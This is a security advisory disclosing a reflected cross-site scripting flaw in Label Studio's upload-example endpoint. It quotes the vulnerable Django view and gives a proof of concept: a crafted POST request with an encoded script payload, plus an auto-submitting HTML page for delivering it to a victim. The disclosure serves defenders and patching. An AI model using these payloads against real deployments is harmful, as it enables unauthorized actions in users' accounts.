GHSA-8jhr-wpcm-hh4h

Summary

The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks.

Details

The vulnerability is reproducible when sending a properly formatted request to the POST /projects/upload-example/ endpoint. In the source code, the vulnerability is located at label_studio/projects/views.py.

39: @require_http_methods(['POST'])
40: def upload_example_using_config(request):
41:     """Generate upload data example by config only"""
42:     config = request.POST.get('label_config', '')
43: 
44:     org_pk = get_organization_from_request(request)
45:     secure_mode = False
46:     if org_pk is not None:
47:         org = generics.get_object_or_404(Organization, pk=org_pk)
48:         secure_mode = org.secure_mode
49: 
50:     try:
51:         Project.validate_label_config(config)
52:         task_data, _, _ = get_sample_task(config, secure_mode)
53:         task_data = playground_replacements(request, task_data)
54:     except (ValueError, ValidationError, lxml.etree.Error):
55:         response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST)
56:     else:
57:         response = HttpResponse(json.dumps(task_data))
58:     return response

The vulnerability is specifically located in line 57, where HttpResponse is used.

57:         response = HttpResponse(json.dumps(task_data))

PoC

Send the following request after changing the {host} to your own.

POST /projects/upload-example/ HTTP/1.1
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e

Or you can create a vulnerable HTML page by changing {domain} beforehand, which can later be sent to the victim.

<html>
  <body>
    <form action="http://{domain}/projects/upload-example/" method="POST">
      <input type="hidden" name="label&#95;config" value="&lt;View&gt;&lt;Text&#32;name&#61;&quot;text&quot;&#32;value&#61;&quot;&#36;textjmwwi&amp;lt&#59;script&amp;gt&#59;alert&#40;1&#41;&amp;lt&#59;&#47;script&amp;gt&#59;s8m37&quot;&#47;&gt;&lt;&#47;View&gt;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

• Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing document.cookie, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.